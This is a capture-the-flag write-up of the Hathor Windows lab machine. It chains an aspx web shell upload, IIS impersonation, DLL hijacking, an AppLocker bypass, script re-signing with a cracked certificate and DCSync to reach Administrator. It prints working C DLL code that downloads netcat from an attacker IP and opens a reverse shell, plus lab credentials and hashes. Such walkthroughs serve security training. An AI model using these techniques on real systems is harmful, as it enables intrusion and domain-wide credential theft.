Hathor was an insane windows machine that involved logging to mojopotral using default admin creds, uploading aspx web shell, enumerating the system to get BeatriceMill credentials, being a web service user we can perform IIS Impersonatation to get a reverse shell as BeatriceMill, on further enumeration, 7zip is being executed which we can take advantage of by performing DLL Hijacking on 7zip64.dll which gets executed as GinaWild, from the recycle bin a certificate can be found that’s used for sigining the powershell scripts , through this we can edit and sign Get-bADpasswords.ps1 and get a shell as bpassrunner user which has DCSync rights through which we can request for NTDS.dit which has all the password hashes of the domain and get Administrator.
NMAP
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: DCF8D506B68E858EE6F83FB988066A57
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE POST
|_ Potentially risky methods: TRACE
| http-robots.txt: 29 disallowed entries (15 shown)
| /CaptchaImage.ashx* /Admin/ /App_Browsers/ /App_Code/
| /App_Data/ /App_Themes/ /bin/ /Blog/ViewCategory.aspx$
| /Blog/ViewArchive.aspx$ /Data/SiteImages/emoticons /MyPage.aspx
|_/MyPage.aspx$ /MyPage.aspx* /NeatHtml/ /NeatUpload/
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Home - mojoPortal
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-21 12:39:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Issuer: commonName=windcorp-HATHOR-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-03-18T07:51:40
| Not valid after: 2023-03-18T07:51:40
| MD5: ccb0 22ba 7668 9b5b ab85 038c 5b18 1913
|_SHA-1: 2a0b a4da 1f04 33a7 e1a8 14d1 1dd3 6893 9eda 96e7
|_ssl-date: 2022-04-21T12:42:10+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Issuer: commonName=windcorp-HATHOR-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-03-18T07:51:40
| Not valid after: 2023-03-18T07:51:40
| MD5: ccb0 22ba 7668 9b5b ab85 038c 5b18 1913
|_SHA-1: 2a0b a4da 1f04 33a7 e1a8 14d1 1dd3 6893 9eda 96e7
|_ssl-date: 2022-04-21T12:42:11+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Issuer: commonName=windcorp-HATHOR-CA-1
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49697/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
61813/tcp open msrpc Microsoft Windows RPCPORT 80 (HTTP)
On the web page we get a page under construction page also at the bottom we can see an option to login
Since we don’t know the creds, we can try the default like admin:admin, but they didn’t worked
Running disearch to fuzz for files and directories from which we didn’t get anything as most of the paths we get results in 403 status code
Looking at robots.txt we do get some entries
But still we were either getting 403, page not found or redirecting us back to login page except for /Setup which only tells that setup is disabled
So in the end I decided to just sign up for an account
And after logging there wasn’t anything that we could do with a normal user on this site
After looking for default credentials which I should have done that before, found a forum for mojoportal which talks about the default admin username to be admin@admin.com and the password admin
This worked and we are now logged in as the administrator
There were a lot of options and I spend a lot of time in understanding what do I need to do here as there wasn’t any blog talking about exploits for this forum
Foothold
In filemanager we do see an option to upload files, since this is a windows server, it will be executing aspx files so we need to upload aspx to get command execution, I created a simple aspx file to test if we can upload this file
This gives us an error, so we are not allowed to upload aspx files, instead of uploading an apsx file we can copy the contents and change the extension
It won’t show that our aspx file is copied in the current directory
If we check the System logs we'll see a path /Data/Sites/1/media/ which is supposed to where that htmlfragment directory is
This was is loading the htm file that we just edit but it wasn’t loading the aspx file for some reason
So I just went with copy pasting aspx web shell which I found from github and see if that will work as maybe need to import something to execute aspx files
And after editing and copying the file with aspx , visiting the link again, the aspx web shell worked
We can execute the commands as the web user
Looking at the permissions of this user, we are not in any interesting groups
Going into C:\Users we see some users
Privilege Escalation (BeatriceMill)
In C:\ drive we see an interesting folder called Get-bADpasswords which is a powershell script that is use for finding bad or weak passwords for the AD users
We can get the results of this tool by going to C:\Get-bADpasswords\Accessible\CSVs
Downloading the csv file we can see that BeatriceMill has a weak passsword and the hash of this account is 9cb01504ba0247ad5c6e08f7ccae7903. I used crackstation to see if we can crack this hash
But we weren’t able to authenticate on smb, so I tried to use the credentials on ldap by using windapsearch
windapsearch --dc 10.10.11.147 -d 'windcorp' -u 'BeatriceMill' -p '!!!!ilovegood17' -m usersThis returned 3538 users so could be that we are not allowed to access smb but still it's an issue that we can't remote access through Beatrice if either smb or winrm is not available to us, to get a shell as Beatrice we can abuse IIS impersonation that will allow the web application to run the code under Beatrice
By following this we can copy the code for impersonation for Visual C# .NET
In this section of the code we can call the aspx reverse shell function also replace the username, domain and the password for Beatrice so the final aspx file would look like this, after uploading it and getting a reverse shell as BeatriceMill
I tried running bloodhound-python(kerberos) to enumerate the domain
getTGT.py windcorp.htb/beatricemill
We don’t see anything interesting other than bpassrunner having DCSync rights on the domain meaning that we can dump ntds.dit file from the dc, so enumerating the C:\ we can see a folder named share
Privilege Escalation (Ginawild)
Here there’s autoit3 and further going into scripts folder we can see an autoit3 script having 7zip script and a dll, we can check the autoit3 script it's using that dll
This is where we can do an attack called DLL Hijacking where we would be replacing contents of 7-zip64.dll and let the autoit3 execute the 7zip script allowing it to run our dll, We can try making the dll execute whoami command to see with which user this script is being executed
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("whoami > C:\\Windows\\Temp\\uwu.txt");
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}Compiling it to a windows shared library using mingw32
x86_64-w64-mingw32-gcc ./check.c -shared -o 7-zip64.dllAnd after a few minutes we’ll see the text file which we appended the output of whoami command resulting to the user ginawild
But getting a reverse shell wasn’t simple as either netcat or a reverse shell payload was being flagged and getting removed, So checking the Applocker with the powershell command
Get-AppLockerPolicy -effective -xmlThis returned a lot of stuff, so we need to transfer it to our host machine, I used tmux copy option by using the prefix keys ctrl+b + [ to enter in copy mode , then ctrl+space to start copy selection , ctrl+w to end selection and ctrl+b +] to paste in tmux pane
We can then just save this in a file and open the xml in a browser
Our focus should be on exe as we want to run netcat, so expanding this, we’ll see a policy for allowing exe file to be executed
Here it’s allowing Bginfo64.exe to be executed and it's not checking the hash of the file so we could replace it with our nc.exe and make it execute it through that dll but before that let's see what permissions are there for Bginfo exe
https://superuser.com/questions/322423/explain-the-output-of-icacls-exe-line-by-line-item-by-item
Checking what these permissions mean, the ITDep group has read,execute and is a write owner for this exe, ginawild belongs to this group so we can replace this with nc64.exe through the dll and also make it execute it, make sure to use 1.12 version of netcat from here as the defender is going to flag it.
Wait for a minute for the bginfo.exe to execute and this will run the dll, make a request to download nc and will return us the reverse shell
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("curl 10.10.14.18:3333/nc64.exe -o C:\\share\\Bginfo64.exe);
system("C:\\share\\Bginfo64.exe 10.10.14.18 5555 -e cmd.exe");
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}After having a reverse shell as gina, I didn’t found anything in directories but in the recycle bin there was a pfx file that we can read
https://superuser.com/questions/395015/how-to-open-the-recycle-bin-from-the-windows-command-line
If we try to read this pfx file, it’s protected with a password
I tried using beatrice’s password but the shell got hung up, so to transfer this on my host machine I used cerutil to convert the contents to base64
certutil -encode .\cert.pfx cert.b64But we don’t want BEGIN CERTIFICATE as it won't get decoded properly, we can remove these keywords with
findstr /v CERTIFICATE .\cert.b64 > removed_headers.b64Copy the content into the tmux buffer and pasted on terminal
Using pfx2john we can generate the pfx hash and crack it using john
python2 /opt/john/run/pfx2john.py ./cert.pfx > hashjohn ./hash --wordlist=/opt/SecLists/Passwords/rockyou.txtPrivilege Escalation (bpassrunner)
Now with this pfx certificate we can sign a powershell script and let it execute because if we go back to C:\Get-bADpasswords, the script Get-bADpasswords.ps1 is being executed through a background process and it's signed
Checking what permissions are there on this script
We have the permissions to modify this script, so let’s try replacing the contents to execute netcat which is the Bginfo64.exe
Start-Process -FilePath "C:\Share\Bginfo64.exe" -ArgumentList "10.10.16.20 7777 -e powershell.exe"Right now, this script isn’t signed, so it can’t be run on the system
We can sign this powershell script with
$CertPath ="C:\Get-bADpasswords\cert.pfx"
$CertPass = "abceasyas123"
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($CertPath, $CertPass)
Set-AuthenticodeSignature -Certificate $Cert -FilePath C:\Get-bADpasswords\Get-bADpasswords.ps1But it didn’t work as the powershell was running in constrained mode
There’s a tool to sign to sign the files called signtool
Issue is that we can’t download it directly, we need to install Windows Development kit, so I had to switch to my windows machine and install the development kit only which is about 1.9 GB
After installing the development kit
C:\Program Files (x86)\Windows Kits\10\bin\x64Transfer signtool.exe on the target machine and then run the command to sign the script
.\signtool.exe sign /f C:\Users\ginawild\cert.pfx /p abceasyas123 C:\Users\ginawild\Get-bADpasswords.ps1
After this copy it to C:\Get-bADpasswords and run run.vbs to trigger this powershell script
Now getting a shell as bpassrunner , we can see a folder named Credentials in Documents folder having a password in form of secure string
Rabbit Hole
Reading this file we get a secure string password
I looked up a video by ippsec on Reel machine in which he showcased how to convert it back to plain text
This password wasn’t for bpassrunner as there was user called mailuser in the username folder so this was a rabbit hole
Checking in in which groups this user belongs to
We are in Account Operators group with which can we add users into the domain
Privilege Escalation (Administrator)
This account had DCSync rights as we saw from bloodhound, meaning that we can get the hash of any user we want
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
Get-ADReplAccount -SamAccountName Administrator -Server 'hathor.windcorp.htb'But this wasn’t working on winrm or on smb as NTLM authentication is disabled.
We can get a ticket for the administrator using impacket’s get-TGT.py
It gives an error regarding “Clock skew too great”, we just need to synchronize the time with domain controller using ntpdate windcrop and want the ntp to set to false as it's going to keep updating the time zone
timedatectl set-ntp false
sudo ntpdate windcorpsudo python3 /opt/impacket/examples/getTGT.py windcorp.htb/Administrator -hashes :b3ff8d7532eef3
96a5347ed33933030fWe can also dump NTDS.dit using the administrator’s ticket
References
- https://www.mojoportal.com/Forums/Thread.aspx?pageid=5&t=2902~-1
- https://github.com/tennc/webshell/blob/master/Backdoor%20Dev%20Shells/devshell.aspx
- https://github.com/improsec/Get-bADpasswords
- https://github.com/borjmz/aspx-reverse-shell
- https://www.faqforge.com/powershell/get-list-windows-powershell-modules-can-imported/
- https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnet/development/implement-impersonation
- https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking
- https://stackoverflow.com/questions/2033997/how-to-compile-for-windows-on-linux-with-gcc-g
- https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1588s
- https://superuser.com/questions/322423/explain-the-output-of-icacls-exe-line-by-line-item-by-item
- https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration
- https://stackoverflow.com/questions/28625178/bash-certutil-command-not-found
- https://dmfrsecurity.com/2017/01/07/windows-base64-encoding-and-decoding-using-certutil/
- https://docs.microsoft.com/en-us/windows/win32/seccrypto/signtool
- https://stackoverflow.com/questions/31869552/how-to-install-signtool-exe-for-windows-10
- https://www.praveenc.com/posts/code-signing-on-windows/
- https://eternallybored.org/misc/netcat/
- https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1973s&ab_channel=IppSec
- https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
- https://techdirectarchive.com/2020/04/07/how-to-synchronizing-linux-system-clock-with-a-network-time-protocol-ntp-server/
- https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
- https://github.com/jazzpizazz/BloodHound.py-Kerberos
